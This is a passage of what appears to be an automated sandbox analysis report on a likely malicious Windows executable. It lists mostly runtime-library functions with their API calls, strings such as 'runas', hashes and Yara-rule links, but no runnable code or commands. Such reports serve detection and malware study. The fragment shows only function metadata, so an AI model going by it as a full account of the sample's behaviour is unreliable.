Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID:
String ID: list too long
API String ID: 0-1124181908
Opcode ID: d93f442f0062046d0ca75204e9cac3b8089d845c535a7354a96ddd0ff8f50bf0
Instruction ID: 0c65cfc103739af2c1d8ae4b21ed87558f9ca60a2256be4a4cad73e64d4ffd2b
Opcode Fuzzy Hash: d93f442f0062046d0ca75204e9cac3b8089d845c535a7354a96ddd0ff8f50bf0
Instruction Fuzzy Hash: B951B1B4D04719ABDB10DF64CC45B9AF7B4FB04710F0082AAE91CA7381DB70AA85DF96

Function 00CDC640 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00CDC677
___except_validate_context_record.LIBVCRUNTIME ref: 00CDC67F
_ValidateLocalCookies.LIBCMT ref: 00CDC708
__IsNonwritableInCurrentImage.LIBCMT ref: 00CDC733
_ValidateLocalCookies.LIBCMT ref: 00CDC788

Strings

csm, xrefs: 00CDC71D

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: f1d891b34c2ca7c384e2beeddcb6ff310c1e4d571b67ef084ab4d0b10681b427
Instruction ID: 6485bb67d1845ce6c97b1b3063fd94cebb0778267ae8da0e81d35d432f84a4b3
Opcode Fuzzy Hash: f1d891b34c2ca7c384e2beeddcb6ff310c1e4d571b67ef084ab4d0b10681b427
Instruction Fuzzy Hash: B841B434E0020AABCF10DF68C8C4AAEBBB5EF44314F148057EA159B392D731DA06DF90

Function 00CE84D5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 00CE852C
ext-ms-, xrefs: 00CE8540

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 3f27f24a81ddf60ecdaead8a6bea4929bba874a4736b996c2c5a289de7c4e072
Instruction ID: 46307c88b28bd7399f0b81376a582797eb9049d161489fe35074154fa7775d6b
Opcode Fuzzy Hash: 3f27f24a81ddf60ecdaead8a6bea4929bba874a4736b996c2c5a289de7c4e072
Instruction Fuzzy Hash: 1521E771A06391ABEF218B779C45B5A77589B057A0F150221ED2EE72E1DF30DE0896F0

Function 00CF1236 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00CF0F82: _free.LIBCMT ref: 00CF0FA7

_free.LIBCMT ref: 00CF1284

Part of subcall function 00CE8006: HeapFree.KERNEL32(00000000,00000000,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?), ref: 00CE801C
Part of subcall function 00CE8006: GetLastError.KERNEL32(?,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?,?), ref: 00CE802E

_free.LIBCMT ref: 00CF128F
_free.LIBCMT ref: 00CF129A
_free.LIBCMT ref: 00CF12EE
_free.LIBCMT ref: 00CF12F9
_free.LIBCMT ref: 00CF1304
_free.LIBCMT ref: 00CF130F

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
Instruction ID: 5c2fcd4d44fc8b367265177cebbe93ebbbebd4f8e81e72d9876f8a44e3500d77
Opcode Fuzzy Hash: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
Instruction Fuzzy Hash: B4115E71941B08AAD6B0BBB1CC07FDBB7DDAF04B40F404C15B3AEA6053DB65B609A752

Function 00CE75BF Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00CE7607
__fassign.LIBCMT ref: 00CE77EC
__fassign.LIBCMT ref: 00CE7809
WriteFile.KERNEL32(?,8B18EC83,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CE7851
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00CE7891
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CE7939

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: c9ee402a856c9957ad25b8a635298a65912cc5affcce4003fa3641f088cae194
Instruction ID: 6b2fa41761091c4b639ea5c46479c603a0bb11b82428e0ea4216ea1f189c4b01
Opcode Fuzzy Hash: c9ee402a856c9957ad25b8a635298a65912cc5affcce4003fa3641f088cae194
Instruction Fuzzy Hash: 6BC1B175D042989FCB15CFA9C8949EDBBB5FF08314F28426AE855FB342D6319E02CB60

Function 00CD9626 Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00CD966F
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00CD96DA
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CD96F7
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00CD9736
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CD9795
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00CD97B8

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 9b0f77bd0735e5d8efe7989b05db82aeff56345254a0e0b6011d1f5508a947ec
Instruction ID: 43d012991c8ce3f56bf0bb815c21a6449b721ffc8656db2f6d6c9ab6cec227f2
Opcode Fuzzy Hash: 9b0f77bd0735e5d8efe7989b05db82aeff56345254a0e0b6011d1f5508a947ec
Instruction Fuzzy Hash: D751B17A610206BBEF209F61DC85FAB7BA9EF44750F16402AFA14D63A0D730CE10DB60

Function 00CD45D0 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00CD4605
std::_Lockit::_Lockit.LIBCPMT ref: 00CD4627
std::_Lockit::~_Lockit.LIBCPMT ref: 00CD4647
__Getctype.LIBCPMT ref: 00CD46DD
std::_Facet_Register.LIBCPMT ref: 00CD46FC
std::_Lockit::~_Lockit.LIBCPMT ref: 00CD4714

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 4724c011e99abbcc8a543613e857be9d6551fc1c459061226e69122dcf95f308
Instruction ID: 661c6afab1b24c8c5c2b589c110b70a891b36388f3f85ac937932db02b5aa4db
Opcode Fuzzy Hash: 4724c011e99abbcc8a543613e857be9d6551fc1c459061226e69122dcf95f308
Instruction Fuzzy Hash: 6B419E719002149FCB29DF54D841AAEB7B4EF55B10F11815AEA0AAB391DF30EE46CBA0

Function 00CB89E0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 322sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064,79C85444,?,00000000,00CF8F3D,000000FF), ref: 00CB8A1C
__Init_thread_footer.LIBCMT ref: 00CB8AB6

Part of subcall function 00CD98E8: EnterCriticalSection.KERNEL32(00D18FA8,75920F00,?,00CB8ABB,00D1CDC0,00CFFF40), ref: 00CD98F2
Part of subcall function 00CD98E8: LeaveCriticalSection.KERNEL32(00D18FA8,?,00CB8ABB,00D1CDC0,00CFFF40), ref: 00CD9925
Part of subcall function 00CD98E8: WakeAllConditionVariable.KERNEL32(?,00D1CDC0,00CFFF40), ref: 00CD999C

CreateThread.KERNEL32(00000000,00000000,00CB8880,00D1C578,00000000,00000000), ref: 00CB8B1B
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CB8B26

Part of subcall function 00CD9932: EnterCriticalSection.KERNEL32(00D18FA8,00000000,75920F00,?,00CB8A41,00D1CDC0), ref: 00CD993D
Part of subcall function 00CD9932: LeaveCriticalSection.KERNEL32(00D18FA8,?,00CB8A41,00D1CDC0), ref: 00CD997A

Strings

runas, xrefs: 00CB8753

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: CriticalSection$EnterLeaveSleep$ConditionCreateInit_thread_footerThreadVariableWake
String ID: runas
API String ID: 4065365256-4000483414
Opcode ID: 9bc0742cb977f2845d6be9d64f2d6cc8fc6b15bce15c087b1a0837b15f0b2e17
Instruction ID: c6fe0de8267406c2a4279bf63fc8c779d476c781e589702cedd82220aa3e3037
Opcode Fuzzy Hash: 9bc0742cb977f2845d6be9d64f2d6cc8fc6b15bce15c087b1a0837b15f0b2e17
Instruction Fuzzy Hash: FAB12571610208AFEB08DF68DC86BDD7B6AEB45704F50821EF5149B3C1CB75A985CBA1

Function 00CDC804 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00CFBC1D,00CDC7FB,00CDAE94,00CD7BA9,79C85444,?,?,?,00000000,00CFC7D7,000000FF,?,00CB2576,?,?), ref: 00CDC812
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CDC820
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CDC839
SetLastError.KERNEL32(00000000,?,00000000,00CFC7D7,000000FF,?,00CB2576,?,?,0000000F,00CB3BA5,00000000,0000000F,00000000,00CFC170,000000FF), ref: 00CDC88B

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 0f56b2d42dd2bd5718d6c204432bf7f6877ffa88f0b9d85960d1e7a944c395fd
Instruction ID: 508842d5798b0ee5f9ba5cc517f7855675696c0ab6d9442f0c702cdb71509736
Opcode Fuzzy Hash: 0f56b2d42dd2bd5718d6c204432bf7f6877ffa88f0b9d85960d1e7a944c395fd
Instruction Fuzzy Hash: 2F01B1365093137EA72526767CC69A72694EF02B76730022BF721C13E2EF528C42F260

Function 00CEF497 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\6uHfmjGMfL.exe, xrefs: 00CEF49C

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\6uHfmjGMfL.exe
API String ID: 0-3138345258
Opcode ID: 66d582bad22f0c9bdeea444c1a64c29b29bed3e30065c4ba79bb166b5b881133
Instruction ID: b120f57899571d0f5b9a254ee5a6eebcce6806fafc0aa16f4dc501c56398c6f2
Opcode Fuzzy Hash: 66d582bad22f0c9bdeea444c1a64c29b29bed3e30065c4ba79bb166b5b881133
Instruction Fuzzy Hash: 82210871200285BFEB21AFBB8C41D6B776DEF203647108638F929C7191E731EE5197A0

Function 00CDD857 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,00CDD918,?,?,00000000,?,?,00CDD9CA,00000002,FlsGetValue,00D033D8,00D033E0,?), ref: 00CDD8E7

Strings

api-ms-, xrefs: 00CDD8A7

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 4a805a0c4561ae72c46d161547a78fd89506f889844709d015d7282676380ff4
Instruction ID: 40b66121c515b6869e74e0459fe1d5bb5cfceea1fdac6b1beb45d8ccb27f034f
Opcode Fuzzy Hash: 4a805a0c4561ae72c46d161547a78fd89506f889844709d015d7282676380ff4
Instruction Fuzzy Hash: 48118235E41321ABDF235B79DC45B5A7398AF01770F150222EA66EB3C0D770EE04AAE5

Function 00CDDCF2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00CDDCE7,?,?,00CDDCAF,00000000,00000000,?), ref: 00CDDD07
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CDDD1A
FreeLibrary.KERNEL32(00000000,?,?,00CDDCE7,?,?,00CDDCAF,00000000,00000000,?), ref: 00CDDD3D

Strings

CorExitProcess, xrefs: 00CDDD12
mscoree.dll, xrefs: 00CDDD00

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: d3cb376d5ca9d4a049a10a7015645cd51aa20ae28a2cc8cb34d2db69bd4cb0c6
Instruction ID: 81552e81cd0b08877fcacecbf3300b5f8edda0bc267e3827f5d881cdcf38b36c
Opcode Fuzzy Hash: d3cb376d5ca9d4a049a10a7015645cd51aa20ae28a2cc8cb34d2db69bd4cb0c6
Instruction Fuzzy Hash: C2F08C34A40318FBDF119B50ED0AB9D7AA9EF00756F100061F509E12A0CB708F04DAB0

Function 00CE57C0 Relevance: 7.8, APIs: 5, Instructions: 255COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00CE6C20: GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
Part of subcall function 00CE6C20: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3

_free.LIBCMT ref: 00CE5AAB
_free.LIBCMT ref: 00CE5AC4
_free.LIBCMT ref: 00CE5B02
_free.LIBCMT ref: 00CE5B0B
_free.LIBCMT ref: 00CE5B17

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: f26026e1509a924ef44de8d0f89b8bd24f78d3ba811ce3f37c97a3c20b83945c
Instruction ID: 42adc3fb798fc6b6d71b5db392150519805747e1d6268ec644f77128bcd71814
Opcode Fuzzy Hash: f26026e1509a924ef44de8d0f89b8bd24f78d3ba811ce3f37c97a3c20b83945c
Instruction Fuzzy Hash: C7B17B75901659DFDB24DF19C884AADB3B5FF08318F5046AAE819A7390E730AE90DF40

Function 00CE5335 Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00CE8235: HeapAlloc.KERNEL32(00000000,00CD0B87,?,?,00CD9C1F,00CD0B87,?,00CD321E,8B18EC84,75920F00), ref: 00CE8267

_free.LIBCMT ref: 00CE5444
_free.LIBCMT ref: 00CE545B
_free.LIBCMT ref: 00CE5478
_free.LIBCMT ref: 00CE5493
_free.LIBCMT ref: 00CE54AA

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: _free$AllocHeap
String ID:
API String ID: 1835388192-0
Opcode ID: dbbb8703fee1710c877d743b17f9df276a075a4b3f2c39054a02c6938e31e9d9
Instruction ID: fbcec2d85b3168057683fc67fe6639c7389b7bb2d85405e979a1a0e442412dfc
Opcode Fuzzy Hash: dbbb8703fee1710c877d743b17f9df276a075a4b3f2c39054a02c6938e31e9d9
Instruction Fuzzy Hash: CF512472A00B04AFDB21DF6ACC41B6AB7F5FF48725F140569E919DB290E730EA40DB50

Function 00CD6F60 Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00CD70E9
__Mtx_unlock.LIBCPMT ref: 00CD70FA
__Cnd_broadcast.LIBCPMT ref: 00CD7120
__Mtx_unlock.LIBCPMT ref: 00CD7126
Concurrency::cancel_current_task.LIBCPMT ref: 00CD716F

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
String ID:
API String ID: 3354401312-0
Opcode ID: 9b90e4e7a8feedd0052a9822de50060d85a0b4ef2e927fea84d5196af9774a66
Instruction ID: 2fda5058cb2a747df3bcf3771b51b71b19c5b6bab06ede651373865844d118ff
Opcode Fuzzy Hash: 9b90e4e7a8feedd0052a9822de50060d85a0b4ef2e927fea84d5196af9774a66
Instruction Fuzzy Hash: 4E616F70901209DFDB14DFA4C954BAEBBB4BF04304F14429AE919A7782DB35AA09DFA1

Function 00CBF4B0 Relevance: 7.7, APIs: 5, Instructions: 159comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00CBF547
CoCreateInstance.OLE32(00D0DFDC,00000000,00000001,00D0E03C,?), ref: 00CBF563
CoUninitialize.OLE32 ref: 00CBF571
CoUninitialize.OLE32 ref: 00CBF630
CoUninitialize.OLE32 ref: 00CBF644

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: Uninitialize$CreateInitializeInstance
String ID:
API String ID: 1968832861-0
Opcode ID: 655b834db8b22794c051ed908d8299002aeeaa5e9cd73c9b80e61bbc36e413fc
Instruction ID: 21f53bca3cb5573e579a6d3f64a90524944395fdd8b9147cceb24e7aa3bb8359
Opcode Fuzzy Hash: 655b834db8b22794c051ed908d8299002aeeaa5e9cd73c9b80e61bbc36e413fc
Instruction Fuzzy Hash: 25518E71A002089FDB04DFA8DC89BDEBBB9EF58714F108129F909E7390D774A945CBA1

Function 00CD4D60 Relevance: 7.6, APIs: 5, Instructions: 107COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00CD4D96
std::_Lockit::_Lockit.LIBCPMT ref: 00CD4DB6
std::_Lockit::~_Lockit.LIBCPMT ref: 00CD4DD6
std::_Facet_Register.LIBCPMT ref: 00CD4E71
std::_Lockit::~_Lockit.LIBCPMT ref: 00CD4E89

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
